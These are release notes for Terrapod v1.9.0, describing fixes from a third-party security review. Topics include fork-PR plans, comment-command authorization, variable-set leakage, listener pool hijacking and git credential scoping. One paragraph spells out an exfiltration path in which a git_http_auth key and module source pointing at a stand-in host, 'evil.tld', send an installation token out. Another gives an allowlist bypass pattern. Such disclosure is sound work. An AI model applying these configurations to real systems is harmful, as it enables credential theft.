github mattrobinsonsre/terrapod v1.9.0

3 hours ago

The release that completes the remediation of an independent third-party security
review of Terrapod, and takes the secure defaults a patch release had no business
taking.

v1.7.7 and v1.8.2 shipped everything from that review that could be made
drop-in. This carries the rest: nine fixes whose effect an operator notices,
which is precisely why they waited for a minor. The review was carried out by
karl0r, who reported everything privately and gave us time to fix it. The
advisories crediting them are published as one event now that this release has
shipped, so that no advisory names a fix an operator cannot yet take.

1.7 reaches end of life with this release. Supported lines are now 1.9 and 1.8.

Read this first: what changes under you

Nine of these alter behaviour on a running deployment. None of them is a surprise
if you read this list; all of them are a surprise if you do not. Each is also
documented in the page you would reach for when it happens to you, not only here.

  • Pull requests from forks no longer plan by default. allow_fork_pr_plans
    now defaults false for new workspaces and new autodiscovery rules
    (GHSA-gp5w-76rw-c452, critical). Existing workspaces keep whatever they
    have
    — the upgrade does not rewrite stored rows, because disabling a plan an
    operator depends on, unasked, is not a patch's business and is not a minor's
    either. A 1.8 deployment defaulted this ON, so audit:
    SELECT name FROM workspaces WHERE allow_fork_pr_plans = true; and turn it off
    where the repository takes pull requests from people who should not reach that
    workspace's credentials. docs/security-hardening.md has the fleet-wide
    remedy as a single bulk-update call.

  • terrapod merge is gone, and every other PR-comment command requires push
    access to the repository
    (GHSA-x4jp-5g4j-f8rr, critical). Commenting was not
    authorization: on earlier releases anyone who could comment could apply real
    infrastructure, and on a public repository that is everyone. There is no
    comment-driven merge at all now — merging despite incomplete applies is done on
    the provider, and the only Terrapod-initiated merge is workspace-configured
    auto-merge after a successful apply. plan, apply, unlock and help
    remain. The permission check fails closed, so a provider error refuses the
    command rather than allowing it, and it needs nothing beyond the
    metadata: read every GitHub App installation grants — verified against the
    live API with a token carrying that permission alone — so it costs no
    permission upgrade.

  • A non-admin can no longer shape a workspace to join a rule-assigned variable
    set
    (GHSA-49q6-pm68-3xgw). An assignment rule selects on labels, name,
    execution mode, agent pool and so on — all of which a workspace's own owner
    controls — so any authenticated user could label their workspace into another
    team's set and receive its secrets. Growing the set of rule-assigned variable
    sets reaching a workspace now requires a platform admin, and the refusal is
    scoped to sets carrying a sensitive or broker-resolved value, so ordinary
    self-service against ordinary configuration is untouched. Shrinking does not
    require an admin; global and explicitly-assigned sets never count. If your teams
    relied on self-service workspaces joining a rule-scoped set that holds a secret,
    an admin now makes that change or assigns the set explicitly. Relatedly,
    drift_status and locked are refused as assignment-rule selectors: both are
    self-assignable, and scoping a credential on transient platform state is not
    something anyone should be able to express. Labels are not a credential trust
    boundary
    , and the documentation now says so.

  • A Helm false is no longer discarded — check two values before you upgrade.
    | default true treated an explicitly configured false as empty and rendered
    true, so an operator's opt-out has been silently inert. Exactly two existing
    values are affected, and both change behaviour on upgrade with nothing in the
    logs pointing back at it:

    value you set you have been getting you will now get
    api.config.notifications.smtp.use_tls false TLS no TLS — mail that was encrypted stops being
    api.config.database.pool_pre_ping false pre-ping on pre-ping off — stale connections handed out

    The SMTP row is the one to act on: your intent is finally honoured, but the
    effect is that mail stops being encrypted, on a release labelled security.
    grep -nE 'use_tls|pool_pre_ping' values.yaml before upgrading, and delete the
    key if what you actually wanted was the default.

  • A listener cannot re-join into a different pool (GHSA-vr88-c3hx-xr4h). A
    name collision across pools returns 409 instead of silently moving the
    listener — which moved the victim's listener into the joiner's pool, where it
    would claim and execute that pool's runs on the victim's cluster with the
    victim's credentials. Re-joining the same pool and renaming are unaffected. What
    this stops is moving a listener between pools by swapping the join token while
    keeping listener.name, the natural Helm-driven way: delete the old
    registration first (DELETE /api/terrapod/v1/listeners/{id}, which needs admin
    on the pool currently holding the name — plausibly another team's), or give the
    listener a new name. A listener image older than this release has never seen a
    409 on join and will most likely retry rather than surface it, so check the
    listener's own logs if a move seems not to take.

  • A narrowed VCS connection now stops a poll cycle, with no HTTP error anywhere.
    Because the allowlist is enforced where the credential is used, a refusal can happen
    in a VCS poll or a drift check — which has no caller to receive a 403. The workspace
    simply stops picking up commits, and the only evidence is its credential will not be used to clone it in the API log, naming the connection and the repository. If you
    narrow a connection, audit the workspaces on it first; docs/runbooks.md has the
    query and the symptom. A narrowing also takes effect on the next clone, not when
    you save it, so an in-flight run finishes against the old scope.

  • A minted git credential is refused if its key is broader than the allowlist. A
    git_http_auth variable sourced from a VCS connection is installed by the runner as
    a git [credential "https://<key>"] section, which git applies by host and path
    prefix
    — so a key of github.com hands the token the whole host. On a narrowed
    connection that key is now refused, even when the workspace's own repository is
    inside the allowlist
    , which is the part that reads as surprising. Narrow the key to
    the owner or the repository it is for (github.com/myorg), widen the connection, or
    switch the variable to source = "static" with a token you scoped yourself. Only
    vcs_connection-sourced credentials are affected, and only on a connection with a
    non-empty allowlist.

  • A minted git credential is only ever installed for its own connection's host, and
    this one applies even if you have never touched allowed-repositories.
    The key on a
    git_http_auth variable is written verbatim into a git [credential "https://<key>"]
    section, so git sends that token to whatever host the key names — and nothing checked
    it against the connection's own server. A key of evil.tld/myorg on a connection
    restricted to myorg/* installed the GitHub App installation token for evil.tld,
    and a module source of git::https://evil.tld/myorg/x.git in the workspace's own
    configuration sent it there; that token carries contents: read across the whole
    installation, and choosing the key needs only the ability to write a workspace
    variable. Found by an independent review of this release, reproduced end to end, and
    closed. Check your git_http_auth keys before upgrading — one naming anything
    other than the connection's own host (for GitHub Enterprise, note server-url holds
    the API base while the key needs the git host) now fails the run with a message
    naming both. docs/runbooks.md has the entry; a static credential is the way to
    authenticate to a genuinely different host.

  • An allowlist pattern containing [ or ] is refused. fnmatch character classes
    defeat the containment check that bounds a minted credential — prod/[!x]* accepted a
    credential scoped to all of prod, which reaches prod/x-secret — so such a pattern
    cannot bound one and is rejected rather than silently trusted. Write the repositories
    out, or use *.

Also changed, and worth knowing before you upgrade

  • A mandatory AI policy gate now holds a run whose plan it could not see in
    full
    (GHSA-v677-9r29-3xq8). The patch releases made a reduced plan declare
    itself; this makes the gate refuse one, which is the half that changes when a
    run blocks. If you have a mandatory gate and large plans, runs that previously
    got a clean verdict will hold and need an admin override — raise
    ai_summary.plan_json_max_bytes if your plans legitimately exceed it, or set
    the gate to advisory. Note the trigger is partly attacker-influenced: the
    reduction is detected from markers in plan text, so anyone who can name a
    resource containing those literals can hold a mandatory gate. That is
    deliberate — failing closed is the point — but it is a cheap way to stall a gate
    and you should know it exists.

  • Resource onboarding runs provider plugins with an allowlisted environment
    (GHSA-658f-j48w-w8m9). Schema discovery makes the engine launch a provider
    plugin — third-party code downloaded from a registry moments earlier — as a
    child process, and that child inherited the API's own environment, which holds
    the key-encryption key, the token signing key, the database DSN and whatever the
    pod's workload identity provides. The subprocesses now get an explicit
    allowlist: process basics, the engine's own TF_* settings, both cases of the
    proxy variables, the CA-bundle variables, and TF_TOKEN_* / TF_CLI_ARGS*
    whole, because those are operator-placed. If discovery stops working after
    upgrading, this is the first place to look
    — anything you supply through
    api.extraEnv outside those lists no longer reaches tofu init.
    docs/terrapod-query.md names what survives.

  • terrapod-migrate refuses an http:// TFE address
    (GHSA-r98p-vq35-mcg2). The TFE API token it carries is as long-lived and as
    privileged as the Terrapod token beside it, and one was protected while the other
    was not, in the same command. Loopback is exempt — including http://[::1]:8080,
    which an earlier draft of the check refused by accident. Set
    TERRAPOD_ALLOW_INSECURE_TRANSPORT=1 if plaintext is genuinely what you want;
    it is the same variable the Terrapod side already honours, so one rule covers
    both halves of the command.

Security

  • A VCS connection has an owner, labels and an optional repository allowlist
    (GHSA-v8g7-pqrj-8mcm). v1.8.2 closed the escalation by requiring the caller to
    already own a workspace on the connection, with a deliberate consequence: the
    first workspace on any connection had to be created by an admin. A connection is
    now a labelled resource like any other, so it can be delegated to a team up
    front, and allowed-repositories closes the part RBAC cannot reach — an entitled
    caller could still point a connection at any repository its credential could
    read, because the repo URL is an ordinary string on the workspace. The allowlist
    is empty by default, meaning any repository, so upgrading changes nothing
    until you narrow one.

    It is enforced at every path that accepts a repository URL — workspace create and
    PATCH, the refs endpoint (a private-repository oracle at workspace-read), the
    config fetch where the source arrives, every minted git credential, and the three
    registry-module sites that name a connection — and again inside the two functions
    that use the credential
    , so a URL stored before a narrowing stops being cloned
    rather than carrying on. That second layer is not belt and braces: checking only the
    accepting paths left the VCS poller cloning to detect a change before anything a
    run would check, so a narrowed connection's credential had already read the
    out-of-scope repository by the time the config fetch refused the run. Drift
    detection reached the archive cache the same way, and — found by the same independent
    review — the registry tag poller, module-impact analysis and the policy-set poller
    clone through their own dispatchers and reached neither check. All of them do now, and
    a guard derived from the tree fails the build if a module that clones stops consulting
    the allowlist.

  • terrapod_vcs_connection is no longer fully immutable. The provider
    resource previously replaced the connection on any change. The three new
    attributes — owner_email, labels, allowed_repositories — are updated in
    place instead, because marking them RequiresReplace would mean adding an
    RBAC label or tightening a repository pattern destroys the connection and
    unlinks every workspace referencing it
    , and a security control that costs an
    estate-wide outage to adjust does not get adjusted. The update sends only those
    three: not the name, and in particular not a credential the plan happens to
    carry, which would otherwise rotate on an unrelated edit. Everything else still
    forces replacement. All three are Optional+Computed, so deleting the attribute
    from your configuration keeps whatever is set
    — widen an allowlist by setting
    [], not by removing the line.

  • A scoped service_bound token cannot mint or widen itself to a
    full-privilege credential
    (GHSA-f7rp-jm3g-3q6p).

  • A pinned token cannot escape its pin through a connection's labels. The new
    label path on the connection gate was handed the principal's live role set, and
    label evaluation short-circuits on admin — so a service_bound token pinned away
    from admin and held by an admin was refused by the explicit gate and granted by
    the label check immediately below it. It was not limited to admin: the live set is
    wider than a bound pin for custom roles too. The gate now uses the intersection of
    the live and pinned sets, which escapes in neither direction, and a source test fails
    if a future caller passes an un-narrowed set.

  • The cross-pool listener-join refusal no longer fails open. GHSA-vr88-c3hx-xr4h
    compared the joining pool against the pool_id on the existing listener record, and
    only when that was readable. A surviving name key pointing at a record that had been
    evicted skipped the comparison entirely, and the re-join then wrote the joining
    pool's id into the orphaned record — the redirect the check exists to refuse, reached
    by bypassing it. An unverifiable record now yields a fresh registration instead of
    inheriting the id, which self-heals; the 409 for a genuine cross-pool collision is
    unchanged.

Bug fixes

  • A deployment may now hold more than one GitLab connection. The unique
    constraint uq_vcs_connections_install has covered
    (provider, github_installation_id) since the initial schema, and that column is
    NOT NULL DEFAULT 0 with no meaning on a GitLab row — so every GitLab connection
    carried 0, the second one collided with the first, and the create returned a
    bare 409 Resource already exists or violates a constraint naming neither the
    column nor the reason. It is now a partial unique index scoped to
    provider = 'github', which is the only place an installation id identifies a
    credential. One connection per GitHub App installation is still enforced.

    Nobody had met this because nothing in the tree created two GitLab connections;
    the end-to-end test for the new repository allowlist was the first, because that
    behaviour is a contrast and needs one open and one restricted connection. The
    cost was real rather than theoretical: the documented remedy for a saturated
    GitLab token is to give a busy repository its own connection, since a GitLab
    token's rate allowance is per token — and that remedy could not be followed.

  • The two GitLab connections this release makes possible need one thing from you.
    A GitLab webhook carries no installation identity, so Terrapod binds an event to a
    connection by host. With two on the same host the only thing distinguishing them is
    the secret in X-Gitlab-Token, so give each one its own webhook_secret — a
    connection relying on the global vcs.gitlab.webhook_secret cannot be told from its
    neighbour, and the event is dropped rather than attributed to the wrong one. Polling
    still catches the change, so the symptom is webhooks quietly stopping accelerating
    anything. The log now names the ambiguity and how many candidates have no secret of
    their own, instead of reporting "unknown project" about a project it knows perfectly
    well.

  • terrapod_vcs_connection's three new attributes can actually be managed as code.
    The server lower-cased, trimmed and truncated owner-email and trimmed each
    allowlist entry. A provider writes the server's response back into state, so every
    one of those made the plan disagree with the result and failed the apply with
    "Provider produced inconsistent result after apply" — the attributes added to make a
    security control delegable could not be set from Terraform at all. All three are now
    stored exactly as sent. Nothing is lost: the match side already folds case and trims
    patterns, which is why the transforms existed and why removing them costs nothing. An
    over-length or non-string owner-email is a 422 rather than silent truncation or a
    500.

  • A constraint violation on a workspace or state write is a 409 or 422, not a 500.
    A workspace name already taken, two creates racing for one, a vcs-connection-id
    naming a connection that does not exist, and — on the CLI's own state-upload path —
    two applies finishing together and colliding on a state serial, which the serial
    check above it cannot prevent because it is check-then-act.

  • The "who receives this variable set" view agrees with what actually gets
    delivered.
    GHSA-49q6-pm68-3xgw refused two assignment-rule dimensions, and only
    the matcher learned about it. A set whose rule used drift_status or locked
    reached nothing while the blast-radius view listed every workspace the rule would
    have selected — over-reporting reach on the one screen an operator reads before
    rotating a credential.

  • A label chip's remove control is a 44px tap target. It was 16px, against the
    project's own hard rule, on a control that deletes something.

Upgrading

Three schema migrations. Two are expand-only with server defaults that reproduce
current behaviour; the third replaces a unique constraint with a narrower partial
index, which cannot break a replica running older code — nothing reads the
constraint, and the duplicate-GitHub-installation case it existed for is also
checked in the create handler before the insert.

A deployment on 1.6, 1.7 or 1.8 upgrades by running only the migrations it has not
seen: the revision chain is linear — 87 revisions, one root, one head — and each
supported line's recorded head sits at a strictly increasing position in it (1.6 at
74, 1.7 at 77, 1.8 at 84, 1.9 at 87).

Nothing needs doing in a particular order, and the upgrade itself asks nothing of
you: the repository allowlist is empty by default, so none of the allowlist
enforcement changes anything until you narrow a connection. Before you do, read the
behaviour list above, grep your values for the two Helm keys, and audit the fork-PR
setting on existing workspaces.

If you already narrow connections — which only a deployment that upgraded to 1.9.0
mid-cycle can, since the allowlist ships here — re-check them after upgrading. The
enforcement now reaches the clone and the minted-credential key, so a connection that
was effectively unenforced on some paths becomes enforced on all of them.

Status

Stable. Every contract snapshot grew and lost nothing — routes, response attributes,
the runner wire protocol, config keys and Helm values are all additive, so a lagging
runner or listener, an un-upgraded go-terrapod or provider, and an existing
values.yaml all keep working. The breaking changes in this release are
behavioural and every one of them is in the first two sections.

Note for anyone upgrading from v1.8.1 or v1.8.2: release/v1.9 branched from
v1.8.2, so everything in both is carried here. The twelve medium-severity fixes from
v1.7.7/v1.8.2 are not re-listed; they are present.

Full Changelog: v1.8.2...v1.9.0

Don't miss a new terrapod release

NewReleases is sending notifications on new releases.